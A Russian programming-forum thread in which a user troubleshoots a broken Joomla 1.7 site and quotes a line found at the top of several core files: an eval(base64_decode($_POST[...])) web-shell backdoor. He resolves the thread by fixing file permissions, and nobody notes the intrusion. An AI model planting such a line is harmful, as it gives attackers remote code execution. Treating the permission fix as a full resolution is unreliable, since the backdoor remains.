Форум программистов
 

Восстановите пароль или Зарегистрируйтесь на форуме, о проблемах и с заказом рекламы пишите сюда - alarforum@yandex.ru, проверяйте папку спам!

Вернуться   Форум программистов > Web программирование > WordPress и другие CMS
Регистрация

Восстановить пароль
Повторная активизация e-mail

Купить рекламу на форуме - 42 тыс руб за месяц

Ответ
 
Опции темы Поиск в этой теме
Старый 05.10.2015, 16:36   #1
pu4koff
Старожил
 
Аватар для pu4koff
 
Регистрация: 22.05.2007
Сообщений: 9,065
По умолчанию Отвалилась Joomla

Жил был кем-то сделанный сайт на Joomla 1.7 и в один прекрасный момент он отвалился (в опере пустая страница, в эксплорере ошибка сервера 500, типа нет такой страницы). Покопался немного и оказалось, что у части php файлов доступ в 000 свалился. Поменял на 644. Админка заработала. Сайт сам так и не работает. В админке с включенными ошибками вываливается:
Цитата:
Notice: Undefined index: n4fdbe4 in /home/stroygr6/public_html/libraries/joomla/error/profiler.php on line 1

Notice: Undefined index: n519400 in /home/stroygr6/public_html/libraries/joomla/cache/storage.php on line 1

Notice: Undefined index: n7e7d3f in /home/stroygr6/public_html/language/ru-RU/ru-RU.localise.php on line 1
Первые строки вида:
PHP код:
<?php eval(base64_decode($_POST['n519400']));?><?php
Что делать? Как быть? Куда копать?
UPD. Уведомления эти сами по себе пропали в админке, но сайт так и не отдаётся

Последний раз редактировалось pu4koff; 05.10.2015 в 17:22.
pu4koff вне форума Ответить с цитированием
Старый 05.10.2015, 17:31   #2
Stilet
Белик Виталий :)
Старожил
 
Аватар для Stilet
 
Регистрация: 23.07.2007
Сообщений: 57,097
По умолчанию

Бэкапа самого сайта конечно нет?
I'm learning to live...
Stilet вне форума Ответить с цитированием
Старый 05.10.2015, 17:39   #3
pu4koff
Старожил
 
Аватар для pu4koff
 
Регистрация: 22.05.2007
Сообщений: 9,065
По умолчанию

Где-то должен быть, надо поискать. Этот сайт пару лет вообще никто не трогал. Я даже не знаю когда он отвалился. Грешу на то, что хостинг во время не оплатили, а по факту может еще и до этого чего отпало.

UPD. Всё. Вопрос снят. Я файлик один пропустил с доступом 444 и еще один с 000. Заработало всё. Знать бы еще с какого перепуга у них права поломались.

Последний раз редактировалось pu4koff; 05.10.2015 в 17:45.
pu4koff вне форума Ответить с цитированием
Ответ


Купить рекламу на форуме - 42 тыс руб за месяц



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
joomla Дмитрий Вен WordPress и другие CMS 5 04.02.2015 15:28
joomla Катринчик Помощь студентам 0 07.04.2012 16:43
Joomla SkrudjMakdak SQL, базы данных 0 15.02.2012 13:17
Joomla Slam1989 WordPress и другие CMS 1 15.12.2010 09:58